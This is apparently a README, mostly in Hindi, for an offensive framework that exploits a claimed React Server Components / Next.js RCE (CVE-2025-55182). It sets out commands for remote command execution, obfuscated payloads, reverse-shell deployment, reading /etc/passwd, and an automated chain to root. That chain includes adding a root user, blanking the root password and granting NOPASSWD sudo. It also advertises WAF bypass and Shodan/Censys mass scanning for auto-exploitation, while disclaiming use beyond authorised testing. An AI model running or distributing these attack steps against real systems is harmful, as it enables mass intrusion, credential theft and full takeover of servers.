
CVE-2025-55182 (React Server Components RCE) के लिए Elite exploitation टूलकिट। Async polymorphic payloads, उन्नत WAF/CDN बाईपास, proxy rotation, Shodan/Censys mass scan, auto-pwn + reverse shells, Nuclei templates, K8s lab और C2 dashboard। Sudeepa Wanigarathna द्वारा लिखित – केवल अधिकृत red team और penetration testing के लिए।
██████╗ ███████╗██████╗ ██████╗ ███████╗██████╗ ██╗ ██╗
██╔════╝ ██╔════╝██╔══██╗██╔══██╗██╔════╝██╔══██╗██║ ██║
██║ █████╗ ██████╔╝██████╔╝█████╗ ██████╔╝██║ ██║
██║ ██╔══╝ ██╔══██╗██╔══██╗██╔══╝ ██╔══██╗██║ ██║
╚██████╗ ███████╗██║ ██║██████╔╝███████╗██║ ██║╚██████╔╝
╚═════╝ ╚══════╝╚═╝ ╚═╝╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝
React2Shell Exploitation Framework v1.0
Author: Sudeepa Wanigarathna
Next.js सर्वर एक्शन्स RCE भेद्यता (React2Shell) के लिए पेशेवर-ग्रेड शोषण ढांचा। प्रारंभिक पहुंच से रूट विशेषाधिकार वृद्धि तक पूर्ण आक्रमण श्रृंखला प्रदर्शित करता है।
क्षमताएँ:
# Check vulnerability
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check
# Execute command
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id"
python3 interactive_shell.py --target http://127.0.0.1:3000
# Complete exploitation: RCE → Enumeration → Root Access
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root
Cerberus-React2Shell-Hades/
├── react2shell_exploit.py # मुख्य शोषण इंजन (400+ पंक्तियाँ)
├── demo_exploit.py # स्वचालित आक्रमण श्रृंखला (290+ पंक्तियाँ)
├── interactive_shell.py # इंटरैक्टिव शेल (280+ पंक्तियाँ)
├── reverse_shell_handler.py # रिवर्स शेल श्रोता (180+ पंक्तियाँ)
├── post_exploit/
│ ├── linux_enum.py # सिस्टम गणना (330+ पंक्तियाँ)
│ ├── priv_esc.py # विशेषाधिकार वृद्धि (320+ पंक्तियाँ)
│ └── __init__.py
├── EXPLOITATION_GUIDE.md # पूर्ण उपयोग दस्तावेज़ीकरण
├── QUICKSTART.md # त्वरित संदर्भ
└── BANNER.txt
# Vulnerability check
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check
# Execute commands
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "whoami"
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "cat /etc/passwd"
# Different payload variants
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --variant spawn
# With obfuscation
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --obfuscate
# Launch shell
python3 interactive_shell.py --target http://127.0.0.1:3000
# Available commands:
# - execute <cmd> : Execute shell command
# - enum : Run full enumeration
# - escalate : Attempt privilege escalation
# - upload <local> <remote> : Upload file
# - download <remote> <local>: Download file
# - shell <lhost> <lport>: Deploy reverse shell
# - info : Show session info
# - exit : Quit
# Terminal 1: Start listener
python3 reverse_shell_handler.py --lport 4444
# Terminal 2: Deploy shell
python3 react2shell_exploit.py --target http://127.0.0.1:3000 \
--revshell --lhost 127.0.0.1 --lport 4444 --shell-type bash
# Full chain: Discovery → RCE → Enum → Root
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root
ढांचा एक पूर्ण 6-चरणीय शोषण श्रृंखला लागू करता है:
id कमांड से कोड निष्पादन की पुष्टि करें/etc/shadow पढ़कर और /root सूचीबद्ध करके रूट पहुंच साबित करेंSUID बायनेरिज़ (GTFOBins)
लिखने योग्य /etc फ़ाइलें
/etc/passwd - नया रूट उपयोगकर्ता जोड़ें/etc/shadow - रूट पासवर्ड साफ़ करें/etc/sudoers - NOPASSWD sudo प्रदान करेंडॉकर एस्केप
कर्नेल शोषण
लिनक्स क्षमताएँ
pip install -r requirements.txt
निर्भरताएँ:
EXPLOITATION_GUIDE.md - उदाहरणों के साथ पूर्ण उपयोग गाइडQUICKSTART.md - सामान्य कमांड के लिए त्वरित संदर्भचेतावनी: यह उपकरण केवल अधिकृत सुरक्षा परीक्षण के लिए है। कंप्यूटर सिस्टम में अनधिकृत पहुंच अवैध है। केवल उन सिस्टमों पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है।
लेखक इस उपकरण के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है। अपने जोखिम पर उपयोग करें।
यह ढांचा इसके लिए डिज़ाइन किया गया है:
MIT लाइसेंस (केवल शैक्षिक उद्देश्यों के लिए)
Sudeepa Wanigarathna
संस्करण: 1.0
अंतिम अद्यतन: दिसंबर 2025
प्रयोगशाला स्थिति: http://127.0.0.1:3000 (चालू)
विस्तृत उपयोग निर्देशों के लिए, EXPLOITATION_GUIDE.md देखें।